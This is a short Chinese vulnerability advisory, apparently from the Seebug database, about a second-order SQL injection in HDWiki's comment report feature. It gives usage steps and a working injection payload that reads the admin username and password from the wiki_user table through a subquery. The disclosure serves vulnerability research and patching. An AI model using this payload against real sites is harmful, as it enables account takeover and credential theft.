hdwiki二次注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 2014年10月11日 官网下的程序 二次注入 ### 详细说明: model/comment.class.php control/comment.php 两个文件 report函数 使用方法 打开http://localhost/index.php?comment-view-1 登陆用户名 输入评论 uid在cookie就能找的到 ',1236789,1), ('admin','1','0','自己的uid','admin','xxx',(select concat(username,0x20,password) from wiki_user where uid=1),236789,1)# 例如 ',1236789,1), ('admin','1','0','2','admin','xxx',(select concat(username,0x20,password) from wiki_user where uid=1),236789,1)# //注意换行符 会被转义 所以提交之前看清楚 点举报--确定--然后返回短信息 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201410/111240218d0d0156abd149a48002cf104f616b3e.png" alt="QQ截图20141011124034.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/111240218d0d0156abd149a48002cf104f616b3e.png) [<img src="https://images.seebug.org/upload/201410/111240130d111219265fa52b583991b23e6f4c32.png" alt="111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/111240130d111219265fa52b583991b23e6f4c32.png)

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息